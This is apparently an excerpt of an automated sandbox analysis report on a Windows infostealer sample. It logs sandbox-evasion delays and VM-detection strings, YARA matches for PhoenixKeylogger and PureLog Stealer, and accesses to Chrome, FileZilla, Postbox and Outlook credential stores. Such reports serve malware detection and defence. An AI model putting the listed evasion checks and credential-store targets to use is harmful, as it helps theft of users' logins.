Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97806s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212	Thread sleep time: -96957s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98779	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98588	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98484	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98266	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98156	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97718	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97606	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97257	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97156	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 97047	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 96935	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99868	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99101	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98106	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97889	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97782	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97657	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95780	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 95094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94736	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94592	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 94375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97954	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97806	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97685	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 96957	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: 6Ek4nfs2y1.exe, 00000008.00000002.2501007282.000000000138F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: Qulzerug.exe, 0000000D.00000002.2504913703.0000000001255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemuV
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1287219825.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1501370521.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1510861203.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2500946506.000000000122D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Qulzerug.exe, 0000000C.00000002.2500217975.0000000001675000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Code function: 8_2_0158DD60 LdrInitializeThunk,

8_2_0158DD60

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Users\user\Desktop\6Ek4nfs2y1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Users\user\Desktop\6Ek4nfs2y1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PhoenixKeylogger

Source: Yara match	File source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.Qulzerug.exe.3af9550.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.75a0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6660040.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.3af9550.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.75a0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.687f060.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Qulzerug.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
